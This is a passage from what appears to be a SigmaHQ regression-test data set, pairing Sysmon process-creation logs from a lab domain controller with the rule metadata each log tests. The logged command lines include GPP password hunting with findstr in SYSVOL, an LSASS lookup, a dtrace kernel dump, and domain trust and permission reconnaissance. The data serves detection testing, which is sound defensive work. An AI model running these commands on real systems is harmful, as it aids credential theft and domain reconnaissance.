\"5AA13A44-D534-68FC-FF30-000000004002\",\n      \"ProcessId\": 168,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\dsquery.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Microsoft AD DS/LDS query command line utility\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"dsquery.exe\",\n      \"CommandLine\": \"dsquery  * -filter \\\"(objectClass=trustedDomain)\\\" -attr *\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": 
\"High\",\n      \"Hashes\": \"SHA1=D6F0AD64BECE9028108C0C807E3C3A0EEAF4C31C,MD5=3A94027001259B03449AB5DC8B764E83,SHA256=A3720A70B407F069E21F2EF759236C2A7871A03D00B0AC7F0ACD201DA1086CB0,IMPHASH=0C732EE7E7F8F559606E6ADF3AA39CDC\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/info.yml",
    "content": "id: 91c77c64-7f4f-4bba-be6a-42377c97b48a\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 3bad990e-4848-4a78-9530-b427d854aac0\n      title: Domain Trust Discovery Via Dsquery\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/3bad990e-4848-4a78-9530-b427d854aac0.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_dtrace_kernel_dump/7124aebe-4cd7-4ccb-8df0-6d6b93c96795.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-27T00:04:12.105550Z\"\n        }\n      },\n      \"EventRecordID\": 33630917,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3380,\n          \"ThreadID\": 4420\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-27 00:04:12.104\",\n      \"ProcessGuid\": \"5AA13A44-B6FC-68FE-0802-000000004102\",\n      \"ProcessId\": 2524,\n      \"Image\": \"C:\\\\Program Files\\\\DTrace\\\\dtrace.exe\",\n      \"FileVersion\": \"10.0.22621.1 (WinBuild.160101.0800)\",\n      \"Description\": \"DTrace/NT\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"dtrace.exe\",\n      \"CommandLine\": \"dtrace.exe  -w \\\"syscall:::return {lkd(0); exit(0);}\\\"\",\n      \"CurrentDirectory\": \"C:\\\\Program Files\\\\DTrace\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-B54F-68FE-E547-0C0000000000\",\n      \"LogonId\": \"0xc47e5\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": 
\"SHA1=5ECD16526AB7288C9910692B3BC73041605CD0CF,MD5=AE913F95E1F94B071DED1FFBB60EDDBD,SHA256=75C00C03BB318FCDB329D29E705C7815E14E48C801D6322984C899FAEDDBBF55,IMPHASH=DC497C8CA3DFCDF940058114BA89B413\",\n      \"ParentProcessGuid\": \"5AA13A44-B6AD-68FE-FC01-000000004102\",\n      \"ParentProcessId\": 10508,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-27T00:04:13.045253Z\"\n        }\n      },\n      \"EventRecordID\": 33630948,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3380,\n          \"ThreadID\": 4420\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-27 00:04:13.044\",\n      \"ProcessGuid\": \"5AA13A44-B6FD-68FE-0902-000000004102\",\n      \"ProcessId\": 7748,\n      \"Image\": \"C:\\\\Program Files\\\\DTrace\\\\dtrace.exe\",\n      \"FileVersion\": \"10.0.22621.1 (WinBuild.160101.0800)\",\n      \"Description\": \"DTrace/NT\",\n      \"Product\": \"Microsoft® Windows® Operating 
System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"dtrace.exe\",\n      \"CommandLine\": \"dtrace.exe  -w -n \\\"syscall:::return {lkd(0); exit(0);}\\\"\",\n      \"CurrentDirectory\": \"C:\\\\Program Files\\\\DTrace\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-B54F-68FE-E547-0C0000000000\",\n      \"LogonId\": \"0xc47e5\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=5ECD16526AB7288C9910692B3BC73041605CD0CF,MD5=AE913F95E1F94B071DED1FFBB60EDDBD,SHA256=75C00C03BB318FCDB329D29E705C7815E14E48C801D6322984C899FAEDDBBF55,IMPHASH=DC497C8CA3DFCDF940058114BA89B413\",\n      \"ParentProcessGuid\": \"5AA13A44-B6AD-68FE-FC01-000000004102\",\n      \"ParentProcessId\": 10508,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_dtrace_kernel_dump/info.yml",
    "content": "id: c81d2cc0-3296-47fd-b57d-334b3a17ab02\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 7124aebe-4cd7-4ccb-8df0-6d6b93c96795\n      title: Suspicious Kernel Dump Using Dtrace\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/process_creation/proc_creation_win_dtrace_kernel_dump/7124aebe-4cd7-4ccb-8df0-6d6b93c96795.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/c3d76afc-93df-461e-8e67-9b2bad3f2ac4.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-27T00:08:16.515256Z\"\n        }\n      },\n      \"EventRecordID\": 33635575,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3380,\n          \"ThreadID\": 4420\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-27 00:08:16.514\",\n      \"ProcessGuid\": \"5AA13A44-B7F0-68FE-2902-000000004102\",\n      \"ProcessId\": 9040,\n      \"Image\": \"C:\\\\Windows\\\\explorer.exe\",\n      \"FileVersion\": \"10.0.20348.3692 (WinBuild.160101.0800)\",\n      \"Description\": \"Windows Explorer\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"EXPLORER.EXE\",\n      \"CommandLine\": \"explorer  shell:MyComputerFolder\",\n      \"CurrentDirectory\": \"C:\\\\Program Files\\\\DTrace\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-B54F-68FE-E547-0C0000000000\",\n      \"LogonId\": \"0xc47e5\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": 
\"SHA1=8BAA602FDC6BA67545C0717E2B9063A0BFE3F278,MD5=1FB8907465FB58429762D97C1FBEA04A,SHA256=53F36699C35C8F2360608A79F0809BA888C61F15886AE2B1F209A3E9B896CBA7,IMPHASH=BECD30EE79098B21A5BA5E5CF0E18B83\",\n      \"ParentProcessGuid\": \"5AA13A44-B6AD-68FE-FC01-000000004102\",\n      \"ParentProcessId\": 10508,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/info.yml",
    "content": "id: ddbc40a4-117f-4359-9a22-f943dd25535f\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: c3d76afc-93df-461e-8e67-9b2bad3f2ac4\n      title: File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/c3d76afc-93df-461e-8e67-9b2bad3f2ac4.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords/91a2c315-9ee6-4052-a853-6f6a8238f90d.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T13:50:13.199218Z\"\n        }\n      },\n      \"EventRecordID\": 9105822,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 13:50:13.191\",\n      \"ProcessGuid\": \"5AA13A44-D595-68FC-0A31-000000004002\",\n      \"ProcessId\": 7772,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\findstr.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Find String (QGREP) Utility\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"FINDSTR.EXE\",\n      \"CommandLine\": \"findstr  /S cpassword \\\\\\\\AR-WIN-DC\\\\sysvol\\\\*.xml\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      
\"Hashes\": \"SHA1=7E484985CC835B3892F7445D2692227BA2D2E6F5,MD5=D0A20941751521C0D19BD3EABF34C446,SHA256=940CBEC6750076F2A191CBC8DA96AAE1905F7D9709B48C839BBD52884EFF1A45,IMPHASH=A27641A39DA5A6B0717E06BA00E56B7F\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords/info.yml",
    "content": "id: 1f7942f7-fd5d-40e1-ac60-df1298f49bb0\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 91a2c315-9ee6-4052-a853-6f6a8238f90d\n      title: Findstr GPP Passwords\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords/91a2c315-9ee6-4052-a853-6f6a8238f90d.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_findstr_lsass/fe63010f-8823-4864-a96b-a7b4a0f7b929.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T17:41:46.744119Z\"\n        }\n      },\n      \"EventRecordID\": 12151329,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 17:41:46.742\",\n      \"ProcessGuid\": \"5AA13A44-0BDA-68FD-7836-000000004002\",\n      \"ProcessId\": 8892,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\findstr.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Find String (QGREP) Utility\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"FINDSTR.EXE\",\n      \"CommandLine\": \"findstr  lsass\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": 
\"SHA1=7E484985CC835B3892F7445D2692227BA2D2E6F5,MD5=D0A20941751521C0D19BD3EABF34C446,SHA256=940CBEC6750076F2A191CBC8DA96AAE1905F7D9709B48C839BBD52884EFF1A45,IMPHASH=A27641A39DA5A6B0717E06BA00E56B7F\",\n      \"ParentProcessGuid\": \"5AA13A44-08B2-68FD-2136-000000004002\",\n      \"ParentProcessId\": 3204,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_findstr_lsass/info.yml",
    "content": "id: 241a8371-1554-4cfc-8a51-c671669f4a71\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: fe63010f-8823-4864-a96b-a7b4a0f7b929\n      title: LSASS Process Reconnaissance Via Findstr.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_findstr_lsass/fe63010f-8823-4864-a96b-a7b4a0f7b929.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone/47e4bab7-c626-47dc-967b-255608c9a920.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T17:47:01.671694Z\"\n        }\n      },\n      \"EventRecordID\": 12249325,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 17:47:01.664\",\n      \"ProcessGuid\": \"5AA13A44-0D15-68FD-B436-000000004002\",\n      \"ProcessId\": 2764,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\icacls.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"-\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"iCACLS.EXE\",\n      \"CommandLine\": \"icacls  \\\"C:\\\\Program Files\\\\*\\\"\",\n      \"CurrentDirectory\": \"C:\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": 
\"SHA1=0EB3DC9113AE28D77A85A52B3BF7B79A4B7FD24E,MD5=4B8207877186FAFFB90E3A4D9358CBA6,SHA256=054355C415F5686DA598011065E6FDF6BED35C5FDDA81BC5BF22B9D093CC30E2,IMPHASH=446163A548337B5BCF2727BCD1CFB399\",\n      \"ParentProcessGuid\": \"5AA13A44-0C90-68FC-BF1D-000000004002\",\n      \"ParentProcessId\": 10048,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T17:47:01.679477Z\"\n        }\n      },\n      \"EventRecordID\": 12249342,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 17:47:01.673\",\n      \"ProcessGuid\": \"5AA13A44-0D15-68FD-B536-000000004002\",\n      \"ProcessId\": 9016,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\findstr.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Find String (QGREP) Utility\",\n      \"Product\": \"Microsoft® Windows® 
Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"FINDSTR.EXE\",\n      \"CommandLine\": \"findstr  \\\"(M)\\\"\",\n      \"CurrentDirectory\": \"C:\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=7E484985CC835B3892F7445D2692227BA2D2E6F5,MD5=D0A20941751521C0D19BD3EABF34C446,SHA256=940CBEC6750076F2A191CBC8DA96AAE1905F7D9709B48C839BBD52884EFF1A45,IMPHASH=A27641A39DA5A6B0717E06BA00E56B7F\",\n      \"ParentProcessGuid\": \"5AA13A44-0C90-68FC-BF1D-000000004002\",\n      \"ParentProcessId\": 10048,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T17:47:01.687849Z\"\n        }\n      },\n      \"EventRecordID\": 12249358,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        
}\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 17:47:01.681\",\n      \"ProcessGuid\": \"5AA13A44-0D15-68FD-B636-000000004002\",\n      \"ProcessId\": 3356,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\findstr.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Find String (QGREP) Utility\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"FINDSTR.EXE\",\n      \"CommandLine\": \"findstr  \\\"Everyone\\\"\",\n      \"CurrentDirectory\": \"C:\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=7E484985CC835B3892F7445D2692227BA2D2E6F5,MD5=D0A20941751521C0D19BD3EABF34C446,SHA256=940CBEC6750076F2A191CBC8DA96AAE1905F7D9709B48C839BBD52884EFF1A45,IMPHASH=A27641A39DA5A6B0717E06BA00E56B7F\",\n      \"ParentProcessGuid\": \"5AA13A44-0C90-68FC-BF1D-000000004002\",\n      \"ParentProcessId\": 10048,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone/info.yml",
    "content": "id: bfab9c3b-5f4b-496c-aa6a-8870fec99738\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 47e4bab7-c626-47dc-967b-255608c9a920\n      title: Permission Misconfiguration Reconnaissance Via Findstr.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone/47e4bab7-c626-47dc-967b-255608c9a920.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/ccb5742c-c248-4982-8c5c-5571b9275ad3.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T13:51:29.178909Z\"\n        }\n      },\n      \"EventRecordID\": 9129415,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 13:51:29.168\",\n      \"ProcessGuid\": \"5AA13A44-D5E1-68FC-1131-000000004002\",\n      \"ProcessId\": 3384,\n      